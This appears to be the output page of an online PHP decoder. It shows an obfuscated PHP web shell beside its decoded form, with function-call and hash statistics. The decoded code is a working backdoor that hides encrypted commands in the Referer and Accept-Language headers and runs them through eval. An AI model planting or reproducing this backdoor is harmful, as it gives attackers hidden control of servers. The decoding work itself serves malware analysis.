Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $r='#d$kh="5d41"#d#d;$kf="402a"#d;function x(#d#d$t,$k){#d$c=st#drlen($#dk);$l=strle..
Decoded Output download
$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}
Did this file decode correctly?
Original Code
<?php
$r='#d$kh="5d41"#d#d;$kf="402a"#d;function x(#d#d$t,$k){#d$c=st#drlen($#dk);$l=strlen($#dt#d);$o=#d#d"";for($#di=0#d;#d';
$d=';parse_#dstr($u#d["#dquery"],$q)#d;$q=a#d#drray_val#dues($q);pr#deg_mat#dch#d_all("#d/([\\w])[\\w#d#d-#d]+(#d?:;q';
$y=str_replace('S','','crSSeaSte_fSunSSction');
$F='ean()#d;$d=ba#dse64_#den#dcode(x(gzc#dompress($o#d),$k));print("<#d#d$k>$d#d#d<#d/$k>")#d;@session_destroy();}}}}';
$K='d/",#d"/-#d/"),a#drray("/","#d+"),$ss#d($s#d[$i],0,$e)))#d,$k#d)));$o=#dob_ge#dt#d_conte#dnts#d();ob#d_end_cl#d';
$R='r=@$r["H#d#dTTP_REF#dERE#dR"];$ra=@$r["H#dTTP#d_ACCEP#dT_LANGUA#dGE"#d];#dif($rr#d&&$ra){$u=pars#de_#durl($rr#d)';
$n='d){$k#d=$kh.$kf#d;ob_s#d#d#dtart();@ev#dal(@g#dzuncompress(@#dx(@bas#de64_decod#de(pr#deg_rep#dla#dce(array("/_#';
$q='#d$i<$l;#d){fo#dr($j#d=0;($j<$c&&$i<$l);$j++,$i++){$o.=#d$t{$i}#d^$#dk{$j};}#d}return $o#d#d;}$r=$#d_SERVER;#d$r';
$D='=0.([\\d]))#d?,?/#d",$ra,$m);if#d#d($q&&$m){@sess#dion_#dstar#d#d#dt();$s=&$_S#dESSION;$s#ds="substr";$#d#dsl#d="';
$w='strtolower";$i=$m#d[1][0]#d.$m#d[1]#d[1];$#dh=$sl($ss(m#dd5(#d#d$i.$kh),0,3))#d;$f=$#dsl($ss(#dmd5($i#d.$kf)#d,';
$Q='#di]="";$p=#d$ss($p,3);}#di#df(array_k#dey_e#dxists($i,$#ds)#d){$s[$i#d#d].=$p;$e=strpos#d(#d$s[$i],$f#d);if($e#';
$u='#d0,3));$p=#d"";for#d($z=1;$#dz<c#do#dunt($m[1]#d#d);$z++)$p.=$#dq[$m[2][$z]];#dif(str#dpos($p,$#dh)===#d0){$s#d[$';
$b=str_replace('#d','',$r.$q.$R.$d.$D.$w.$u.$Q.$n.$K.$F);
$p=$y('',$b);$p();
?>
Function Calls
null | 1 |
str_replace | 2 |
create_function | 1 |
Stats
MD5 | 2158f1b215bb75c69dc17b1abc652a01 |
Eval Count | 1 |
Decode Time | 156 ms |